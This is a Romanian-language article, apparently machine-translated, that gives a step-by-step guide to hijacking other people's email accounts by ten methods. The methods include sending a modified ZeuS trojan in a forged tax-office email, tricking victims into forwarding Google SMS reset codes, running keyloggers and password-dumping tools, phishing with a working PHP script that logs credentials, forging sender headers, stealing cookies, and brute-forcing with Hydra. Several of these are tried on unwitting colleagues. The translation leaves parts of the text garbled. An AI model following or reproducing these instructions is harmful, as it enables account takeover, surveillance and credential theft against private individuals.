În continuare vom lua în considerare zece în diverse moduri hacking cutie poștală. Fiecare metodă are propria eficiență și complexitate. Singura protecție împotriva tuturor metodelor de hacking este aceasta. Chiar dacă cineva obține acces la căsuța poștală, este puțin probabil să poată citi mesajele, deoarece toate (sau cele mai importante) vor fi criptate.

Metoda 1: utilizați un troian

O modalitate destul de comună de a obține acces la căsuța poștală a altcuiva este trimiterea e-mailuri cu viruși încorporați. Mai exact, virusul nu este încorporat în scrisoarea în sine, ci scrisoarea conține doar un link către virus. În mod obișnuit, conținutul scrisorii ar trebui cumva să „captureze” utilizatorul. Ar trebui să fie ceva la care utilizatorul nu poate să nu reacționeze.

Exemple de troieni sunt DarkComet RAT, SpyEye, Carberp. Am scris deja despre DarkComet RAT, iar despre Carberp a fost scris pe Habré. АSpyEye este troianul nostru intern, dezvoltat de Alexander Panin, care a apărut chiar și în rapoartele FBI.

Am folosit o versiune modificată a troianului ZeuS. La momentul creării (10.29.15), versiunea noastră nu era detectată de niciun antivirus (Fig. 1), mai mult, avea și o funcție de dezactivare a proceselor, inclusiv Dr.Web. Cu toate acestea, Comodo a fost instalat pe computerul victimei - asta este și mai bine.

Ca victimă, am ales-o pe contabila companiei noastre de management, Yulia. De dragul purității experimentului, ea habar nu avea ce eram pe cale să facem. Nu cred că a meritat să vorbim.

Deci avem un ZeuS modificat, dar cum o facem pe Julia să-l ruleze? Dacă îi trimiteți doar un link, este clar că nu va face clic pe el. Promiterea munților de aur într-o scrisoare este, de asemenea, un lucru din trecut, utilizatorii nu mai reacționează la asta.


Orez. 1. Raport VirusTotal

Apoi am decis să trimitem o scrisoare presupusă în numele Serviciului Federal de Taxe (Fig. 2). Am ales ceva care să „prindă” victima.


Orez. 2. Scrisoare de la fisc

Astfel încât câmpul Din să conțină un nume impresionant și nu [email protected], am falsificat antetele scrisorii. Acest lucru se face destul de simplu și exact cum va fi arătat în metoda 5. Să nu ne lăsăm distrași de acest lucru deocamdată.
După cum ne așteptam, Yulia a descărcat programul și a lansat programul de instalare pentru actualizarea formularului de raportare (Fig. 3). Instalarea a fost finalizată folosind Inno Setup în 5 minute. El este cel care va instala și va lansa troianul nostru.


Orez. 3. Instalarea unui troian

După aceasta, putem controla complet computerul victimei (Fig. 4).


Orez. 4. Controlați computerul victimei

Ce putem face? Pentru distracție, ne putem uita la lista proceselor computerizate, care, desigur, nu va conține troianul nostru (Fig. 5). Putem vizualiza sistemul de fișiere (Figura 6).


Orez. 5. Lista proceselor de pe computerul victimei


Orez. 6. Sistem de fișiere pe computerul victimei

Desigur, cel mai important lucru pentru care au fost pornite toate acestea este lista parolelor salvate în browser (Fig. 7).


Orez. 7. Aici vin parolele

Scrisoarea și instalatorul sunt departe de a fi ideale, deoarece totul a fost făcut în grabă. Cu toate acestea, ideea noastră a fost încununată de succes. Pentru a ne atinge obiectivul, am combinat două metode - inginerie socială și scrisori „false”. Ambele metode vor fi discutate mai jos.

Eficiență: medie
Dificultate: medie
Cost: mic

Metoda 2: piratare prin număr de telefon

Esența acestei metode este următoarea. Atacatorul trebuie să cunoască numărul de telefon al victimei specificat la înregistrarea căsuței poștale. Când vă resetați parola serviciul postal vă solicită să introduceți ultimele caractere ale numărului de telefon (sau să selectați un număr de telefon din listă). La acest număr va fi trimis un SMS cu un cod de confirmare pentru resetarea parolei. Atacatorul trimite apoi un al doilea SMS prin care cere codul din SMS-ul anterior.

Utilizatorul, nebănuind nimic, trimite codul de la primul SMS. Cel mai mare dezavantaj al acestei metode este că primul SMS va veni de la Google, iar al doilea va veni de la un număr necunoscut. Succesul acestei metode depinde de inteligența victimei. Să ne uităm la această metodă în practică.

Primul lucru pe care îl vom face este pur și simplu să încercăm să resetam parola, după care Google vă va cere să introduceți parola de care ne amintim. Este clar că nu ne amintim parola, așa că facem clic butonÎmi este greu să răspund (Fig. 8).


Orez. 8. Cerere de recuperare a parolei

În continuare, dacă victima dvs. avea un telefon Android conectat la contul său, Google vă va oferi să trimită o alertă (Fig. 9), care arată așa cum se arată în Fig. 10. Este de remarcat faptul că smartphone-ul nu a scos un singur sunet, ci a afișat pur și simplu o alertă. Dacă nu se află în fața ochilor utilizatorului, există șansa ca acesta să nu-l observe. Dacă utilizatorul face clic pe Nu, atunci nu disperați - repetați acest proces de mai multe ori - mai târziu vei înțelege de ce.


Orez. 9. Propunere de trimitere a unei alerte


Orez. 10. Google Alert

După apăsarea butonului Trimiteți alertă Se va deschide pagina prezentată în fig. 11. Urmați linkul Resetați-vă parola folosind o altă metodă. Se va deschide pagina clasică de resetare a parolei prin cod SMS (Fig. 12). Aceeași pagină se va deschide dacă nu există niciun telefon Android asociat contului dvs.


Orez. 11. Instrucțiuni pentru lucrul cu notificări


Orez. 12. Trimiterea codului SMS

A sosit punctul culminant. Victima primește un cod Confirmări Google(Fig. 13).


Orez. 13. Cod de confirmare

Încercarea de conectare a fost împiedicată cont Google. Trimiteți codul de verificare la Google pentru a vă debloca contul.

În fig. Figura 14 arată cum arată acest mesaj pe ecranul telefonului.


Orez. 14. Mesaj de la un atacator

Pe de o parte, utilizatorul poate acorda atenție număr necunoscut. Pe de altă parte, pune-te în pielea utilizatorului obișnuit. În primul rând, el primește o notificare de resetare a parolei, apoi un SMS cu un cod de confirmare și apoi un mesaj că a fost depistat. activitate suspectă. Desigur, puteți complica puțin lucrurile și puteți crea un număr scurt de la care să fie trimis SMS-ul. Obținerea unui număr scurt cu numele unui serviciu, de exemplu, Google Security, nu este o problemă. Acest lucru nu va face decât să crească probabilitatea de succes.

În cazul nostru, totul a funcționat fără număr scurt. Am primit un cod de activare, care a fost apoi indicat pe pagina de recuperare a parolei. Astfel, am reușit să resetam parola contului și să obținem acces la căsuța poștală.

Obținerea accesului la căsuța poștală nu este totul. Pentru a împiedica victima să ghicească că i-a fost furată căsuța poștală, după resetarea parolei, trebuie să creați parola temporarași trimiteți-l prin SMS și, între timp, faceți o redirecționare către căsuța poștală „hacker”. În acest fel puteți obține controlul cutiei fără a trezi prea multe suspiciuni.


Orez. 15. Configurarea redirecționării

Eficiență: medie
Dificultate: scăzută
Cost: mic

Metoda 3: Accesați computerul

Dacă aveți acces la computerul victimei, puteți presupune că ați piratat deja e-mailul. Puteți rula un keylogger sau un program pe computer pentru a „recupera” parolele contului de e-mail.

Esența unui keylogger este că înregistrează tot ceea ce utilizatorul introduce de la tastatură într-un fișier special. Va trebui doar să mergeți a doua oară la computer pentru a ridica fișierul rezultat (sau a-l primi prin poștă).
Avantajul unui keylogger este că înregistrează totul. Prin urmare, pe lângă parole, puteți obține mult mai multe informatii interesante despre victima ta. Dar au și o mulțime de neajunsuri. Cel mai important este că majoritatea keylogger-ului sunt detectate cu succes de antivirusi, iar dacă pe computerul victimei este instalat un antivirus, keylogger-ul nu va putea fi utilizat. La urma urmei, nu este întotdeauna posibil să dezactivați antivirusul.

Al doilea dezavantaj rezultă din avantajul său. Fișierul rezultat conține o mulțime de informatii inutile. Nu este suficient să colectați informații de la tastatură, de asemenea, trebuie să găsiți ceea ce aveți nevoie printre toate lucrurile inutile - parola.

Al treilea dezavantaj este că, dacă victima folosește un client de e-mail și nu o interfață web, atunci keylogger-ul nu va ajuta deloc. Cel mai probabil, parola a fost deja introdusă în clientul de e-mail și reținută, astfel încât victima nu o introduce de fiecare dată când își verifică e-mailul. Prin urmare, keylogger-ul va înregistra tot ceea ce utilizatorul introduce într-un fișier, cu excepția a ceea ce aveți nevoie.

Mai există un dezavantaj - dacă keylogger-ul selectat nu acceptă trimiterea fișierului rezultat prin e-mail, atunci va trebui să mergeți încă o dată la computer. Exemplu de keylogger -SniperSpy - în cazul în care doriți să îl utilizați.

Programele pentru „recuperarea” parolelor conturilor de e-mail vă permit să obțineți imediat toate parolele care vă interesează, fără a fi nevoie să citiți megaocteți de text pentru a găsi parola de care aveți nevoie. În plus, antivirusul nu le răspunde în niciun fel. Un astfel de program este Mail PassView. Vă permite să recuperați parolele pentru următoarele conturi de e-mail:

  • Outlook Express
  • Microsoft Outlook 2000 (numai conturi POP3 și SMTP)
  • Microsoft Outlook 2002/2003/2007/2010/2013 (conturi POP3, IMAP, HTTP și SMTP)
  • Windows Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x
  • Mozilla Thunderbird
  • E-mail de grup gratuit
  • Yahoo! Mail – dacă parola este salvată în Yahoo! Mesager.
  • Hotmail/MSN mail – dacă parola este salvată în aplicația MSN Messenger.
  • Gmail – dacă parola este salvată în aplicații Gmail Notifier, Google Desktop sau Google Talk.

Am testat programul pe computerele noastre și am declarat: funcționează (Fig. 16). În fig. 16 parole, cum ar fi adrese de e-mailșterse din motive evidente.


Orez. 16. Program de mail PassView

Mail PassView nu este singurul program de acest gen. Există și alte programe:

  1. Outlook Password Decryptor - vă permite să recuperați parolele din Outlook, inclusiv cele mai multe ultimele versiuni(Outlook 2015 merge sub Control Windows 10);
  2. PstPassword este un alt program pentru recuperarea parolelor salvate în Outlook;
  3. WebBrowserPassView este un program pentru recuperarea parolelor stocate în browser. Browserele acceptate sunt IE, Chrome, Opera, Safari, Firefox.

Tot ce aveți nevoie este să știți ce client de e-mail folosește victima. Găsiți un program pentru a „recupera” parola din aceasta client de mail- nici o problemă. Dacă victima folosește interfața web pentru a-și citi cutia poștală, atunci este mai bine să folosească programul WebBrowserPassView. Ea susține totul versiuni Windows, începând din 2000 și terminând cu 10. Versiunile mai vechi precum 98/ME nu sunt acceptate.

Am testat și acest utilitar. Programul a recuperat cu succes toate parolele stocate în browserele IE, Firefox, Chrome și Opera (nu am testat Safari, dar credem că va fi „comanda”) completă, vezi fig. 17. Chiar dacă nu găsiți parola cutiei poștale în această listă, această listă va fi, de asemenea, utilă - la urma urmei, oamenii folosesc adesea aceleași parole pentru diferite servicii.


Orez. 17. Parole recuperate

Deoarece vorbim deja despre recuperarea parolei, s-ar putea să vă fie util programul Dialupass, care recuperează parolele dialup/RAS/VPN. Programul acceptă Windows 2000, Windows XP, Windows 2003/2008, Windows Vista, Windows 7, Windows 8 și Windows 10

Eficiență: mare
Dificultate: scăzută
Cost: mic

Metoda 4: Inginerie socială

Doar leneșii nu au scris despre această metodă. S-au spus deja multe. Crezi că această metodă nu este atât de eficientă pe cât se spune? Nu aveți dreptate.

Cel mai recent, contul de e-mail al directorului CIA, John Brennan, a fost spart. Absurditatea situației este că e-mailul a fost piratat nu de un hacker „condiționat”, ci de un adolescent obișnuit, care a colectat corect informații despre „victima sa”. Adolescentul a contactat prima dată operator de telefonie mobilă dându-se drept angajat suport tehnic, a clarificat detaliile contului lui Brennan.

După aceea, a permis să intre în AOL și, prezentându-se ca Brennan, a cerut să-și reseteze parola. Din moment ce știa toate informațiile necesare (numărul contului de e-mail, ultimele cifre card bancar, cod PIN din 4 cifre, număr de telefon), parola a fost resetată și nimeni nu a bănuit nimic.

Puțin mai târziu, Wikileaks a publicat scrisori de la directorul CIA, vezi fig. 18.


Orez. 18. Scrisori de la directorul CIA, publicate de Wikileaks

Avantajul acestei metode este că nu trebuie să aveți cunoștințe speciale și oricine poate face această metodă. Succesul acestei metode depinde de ingeniozitatea „atacatorului” - dacă poate găsi informatiile necesare sau nu.

Eficiență: mare
Dificultate: medie
Cost: mic

Metoda 5: utilizatori creduli (phishing)

Vom cere utilizatorului să ne spună parola lui. Nu, această metodă nu implică violență fizică și niciunul dintre utilizatori nu va fi rănit în urma experimentului. Cel puțin fizic.

Esența acestei metode este următoarea: trebuie să creați o pagină de autorizare falsă pentru serviciul pe care doriți să-l piratați. De exemplu, dacă doriți să obțineți o parolă pentru GMail.com, atunci trebuie să creați aceeași pagină de conectare.
Apoi, trebuie să atrageți utilizatorul către o pagină falsă. Acest lucru se poate face în mai multe moduri:

  • Trimiteți-i un mesaj presupus în numele administrației serviciului respectiv. În mesaj, indicați ceva de genul „Nu v-ați conectat la contul dvs. de mult timp”. cutie poştală. Dacă nu îl folosiți înainte<Д>.<М>.<Г>, va fi șters." Desenarea unui buton Log in, făcând clic pe care utilizatorul va fi dus la pagina dvs. de autorizare.
  • Trimiteți un mesaj cu un link care ar trebui să intereseze utilizatorul. Când dă clic pe el, va vedea un mesaj care îi cere să se conecteze pentru a vedea conținutul. În zilele noastre, multe servicii vă permit să vă conectați folosind contul dvs. GMail sau unul dintre rețelele sociale. Deci, utilizatorul nu poate bănui nimic.

Foarte des este descris doar „ direcție generală" Am încercat să o implementăm în propria companie și să ne uităm la reacția utilizatorilor obișnuiți. Metoda este destul de complicată și implementarea ei va necesita atât abilități de programare PHP, cât și unele investiții financiare. La urma urmei, vom avea nevoie de găzduire cu suport PHP (pentru a executa script-ul PHP și a găzdui formularul de autorizare) și nume de domeniu, „asemănător” cu numele serviciului piratat. Desigur, un utilizator experimentat va observa imediat frauda, ​​dar haideți să vedem cum reacționează cei mai obișnuiți utilizatori.


Orez. 19. Formular de autentificare

Apoi, le-am trimis unor angajați un mesaj că le-ar fi blocată căsuța poștală. Vă rugăm să rețineți că designul scrisorii nu seamănă nici pe departe cu designul folosit de Google (în afară de logo). Dar, după cum a arătat practica, acest lucru a fost suficient pentru utilizatorii noștri. Ar fi posibil să luați cod sursăîmbunătățiți calitatea e-mailurilor trimise de Google. În condiții reale, un atacator va face exact asta - fiți siguri.


Orez. 20. Scrisoare pe care am trimis-o utilizatorilor

Ce sa întâmplat mai departe? Apoi, utilizatorii au citit e-mailul, au făcut clic pe link și au introdus naiv numele de utilizator și parola care au fost transmise scriptului. Scriptul preia aceste date și le scrie în fișier text. Orice începător care cunoaște elementele de bază ale PHP poate scrie un astfel de script. Exemplu de cod de script (nu scriptul pe care l-am folosit) este afișat în Lista 1.

Listarea 1. Cel mai simplu scenariu pentru înregistrarea parolelor

// am introdus autentificare

$login = $_POST [ "Autentificare" ] ;

// browserul utilizatorului

$browser = getenv ( "HTTP_USER_AGENT" );

// Parolă

$pass = $_POST [ "parolă" ] ;

// Scrieți datele primite

$text = „Login = $loginnPassword = $passnBrowser = $browser”;

// deschide fișierul

$filelog = fopen ("log.txt" , "a+" );

// scrieți șirul

fwrite($filelog, "n $text n");

fclose($filelog); // închide

// redirecționează utilizatorul către pagina de conectare Google către

// era mai puţină suspiciune

antet ( „Locație: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1 ) ;

Rezultatul scriptului nostru este prezentat în Fig. 21.


Orez. 21. Rezultatul scenariului

Să remarcăm încă o dată că totul s-a făcut în grabă. Și mailul Yahoo a fost folosit pentru a trimite mesajul, pentru a nu face față cu antispam. Dar ar fi posibil să luăm o altă cale. De exemplu, găsiți un server SMTP cu trimitere gratuită de scrisori (fără autorizare). De regulă, acesta va fi un server SMTP configurat incorect al unei organizații mici. Listele de astfel de servere sunt actualizate în mod regulat pe resurse speciale. Cred că nu va fi prea greu să găsești o astfel de listă, de exemplu aceasta. Apoi, puteți implementa un server web cu suport PHP pe computerul dvs. local. Apoi veți avea acces la php.ini și puteți specifica serverul SMTP prin care funcția mail() va trimite scrisori.

Pe de altă parte, puteți încerca să trimiteți un mesaj prin propria găzduire (nu este necesar să instalați un server web local). Totul depinde de setările sale. De exemplu, am folosit găzduirea noastră pentru a executa scriptul pentru trimiterea mesajului nostru. Funcția mail() a rulat fără probleme. Este clar că dacă te uiți la toate anteturile scrisorii, „urma” va duce la noi. Dar pentru noi acum acest lucru nu este important. Acum este important ca câmpul „De la” din clientul de e-mail să conțină ceea ce avem nevoie. În prima metodă, am făcut exact asta, adică am folosit funcția mail() pentru a trimite un mesaj.

Funcția standard PHP mail() vă permite să specificați cu ușurință atât textul scrisorii, cât și anteturile acesteia. De exemplu:

$headers = „De la: Serviciul Federal de Taxe " ."rn" . "Răspuns-La: [email protected]" . "rn"; mail($to, $subject, $message, $headers); $headers = "De la: Google " ."rn" . "Răspuns-La: [email protected]" . "rn"; mail($to, $subject, $message, $headers);

. "rn"

„Răspuns la: [email protected]" . "rn";

mail($to, $subiect, $mesaj, $anteturi);

Scrisorile trimise în acest fel au ocolit antispam-ul Google (nu ajungeau în folderul Spam) și erau afișate normal atât în ​​clientul de e-mail (verificat în Outlook și The Bat!), cât și în interfața web. Desigur, înainte de a trimite un mesaj victimei, este mai bine să-l trimiteți în căsuța dvs. poștală și să vă asigurați că scrisoarea este afișată corect, cel puțin că clientul de e-mail detectează corect codificarea. Dacă nu este cazul, trebuie să adăugați anteturi la $headers care descriu codificarea literei.

Am obținut anumite rezultate folosind această metodă. Unii dintre utilizatori și-au lăsat parolele reale. Unii nu au răspuns la această scrisoare și au contactat administratorul. Și unii au ghicit ce se întâmplă și au introdus abracadabra în loc de parolă. Astfel de rezultate mediocre se datorează faptului că nu ne-am pregătit deosebit de bine și am făcut atât formularul de autentificare, cât și scrisoarea în sine de foarte slabă calitate. Dar am primit în continuare mai multe parole reale, așa că această metodă funcționează, în ciuda întregului scepticism.

Eficiență: mare
Dificultate: greu
Cost: mare

Metoda 6: studiază victima și „amintește-ți” parola

Acum să încercăm să ne amintim ceva ce nu știam niciodată - parola pentru căsuța poștală a victimei. Foarte des, serviciile poștale vă permit să restabiliți o întrebare uitată. Și pentru a se asigura că utilizatorul care încearcă să restabilească accesul la cutia poștală este proprietarul acesteia, serviciul poștal pune întrebarea de securitate specificată la înregistrarea cutiei poștale (Fig. 22). Dacă încerci să piratezi pe cineva pe care îl cunoști, sunt șanse să știi deja răspunsul la această întrebare. Dacă piratați parola altcuiva, atunci primul lucru de făcut este să studiați victima.


Orez. 22. Recuperarea parolei pe Yandex

Cu cât colectați mai multe informații despre victimă, cu atât va fi mai ușor să piratați căsuța poștală. Informațiile pot fi colectate în diferite moduri - puteți câștiga încrederea victimei însuși și, ca întâmplător, puteți afla de la el informațiile de care aveți nevoie (de exemplu, numele de fată al mamei sale, vezi fig. 22), sau puteți împrietenește-te cu prietenii victimei. Din fericire, rețelele sociale vă permit să găsiți rapid nu numai victima, ci și prietenii ei.

Eficiență: mare
Dificultate: medie
Cost: mic

Metoda 7: Vulnerabilități XSS

O modalitate de a pirata e-mailul este prin vulnerabilitățile XSS. Dar cu greu poate fi numit eficient. În primul rând, toate vulnerabilitățile XSS găsite în serviciile de e-mail populare sunt remediate foarte repede. În al doilea rând, ținând cont „în primul rând”, va trebui să cauți singur vulnerabilitatea XSS (la urma urmei, toate vulnerabilitățile găsite au fost deja închise). Și căutarea va dura ceva timp. Iar implementarea unui atac printr-o vulnerabilitate XSS necesită abilități avansate. Alternativ, această metodă poate fi luată în considerare. Pur din interes academic. Dar dacă trebuie să vă spargeți rapid e-mailul, aceeași inginerie socială va fi mai eficientă. Dacă doriți să vă uitați la hacking folosind XSS, puteți consulta acest articol. Descrie cum să furi cookie-urile altor persoane. Dacă dezvoltăm subiectul în continuare, puteți înlocui modulele cookie cu ale altcuiva și puteți obține acces la căsuța poștală a altcuiva.

Eficiență: scăzută
Dificultate: greu
Cost: mic

Metoda 8: Furtul cookie-urilor

O altă modalitate bună de a pirata e-mailul este să furați cookie-uri. Desigur, este eficient dacă victima își stochează parolele în browser. Chiar dacă nu primiți o parolă pentru căsuța dvs. poștală, puteți primi parole pentru alte servicii. Utilizatorii folosesc adesea aceleași parole pentru a accesa diferite servicii. Prin urmare, dacă găsiți o parolă pentru un serviciu (de exemplu, un blog, un forum), puteți încerca să o utilizați atunci când vă conectați la contul de e-mail. Există șansa ca el să se potrivească.

Cum să furi cookie-uri? Există diverse metode - de la folosirea unui troian (vezi fig. 23) până la copierea banală pe o unitate flash sau pe FTP dacă vă aflați pe computerul victimei. Nu aveți o aplicație la îndemână pentru a obține parole (vezi metoda 3)? Nici o problemă! Puteți pur și simplu să copiați directorul cu Cookie-uri și să îl analizați pe computer. Pentru a analiza cookie-urile, puteți utiliza o varietate de utilități, dintre care unul este CookieSpy, care acceptă nu numai browsere instalate, ci și portabile, ceea ce vă permite să „introduceți” un director cu cookie-uri în program (Fig. 24).


Orez. 23. Furtul cookie-urilor folosind un troian


Orez. 24. Analiza cookie-urilor de către CookieSpy

Eficiență: medie
Dificultate: greu
Cost: mic

Metoda 9: forța brută

Cel mai ineficient mod. Implică încercarea unei parole folosind o listă. Programul încearcă pur și simplu să ghicească parola folosind metoda aleatorie (cunoscută și ca metoda Cauchy). Desigur, în condiții ideale va reuși mai devreme sau mai târziu. Dar aproape toate serviciile vor bloca căsuța poștală după 3-5 încercări nereușite. Prin urmare, este puțin probabil să puteți utiliza „metoda forței brute”. Dacă doriți cu adevărat să încercați, atunci puteți încerca să utilizați utilitarul Brutus, a cărui utilizare este discutată pe hackerthreads.
Există un alt utilitar destul de popular - THC-Hydra, care vă permite să piratați o mare varietate de servicii: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM -POST, HTTP -GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL , MYSQL, NCP , NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 și v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC și XMPP.

Eficiență: scăzută
Dificultate: medie
Cost: mic

Metoda 10: apelează la profesioniști

Pe Internet nu va fi dificil să găsești contacte ale unui „profesionist” care este implicat în hacking-ul de corespondență. Acesta este cel mai simplu mod. Eficacitatea acestuia depinde de alegerea corectă a specialistului. Avantajul este că aproape tot ce este descris în acest articol va fi făcut pentru tine (poate puțin mai mult, poate puțin mai puțin) și nu va trebui să faci nimic singur. Dezavantaj - „hackerul” se poate dovedi a fi un fraudator elementar. Ca rezultat, nicio cutie poștală piratată, nici bani. Există chiar și forumuri speciale pe Internet unde puteți găsi cu ușurință un „specialist” (Fig. 25). Am șters în mod deliberat adresa forumului pentru a nu face publicitate inutilă nimănui. Cu toate acestea, dacă aveți dorința și capacitatea de a utiliza un motor de căutare, puteți găsi cu ușurință nu numai acest forum, ci și sute de altele similare cu acesta.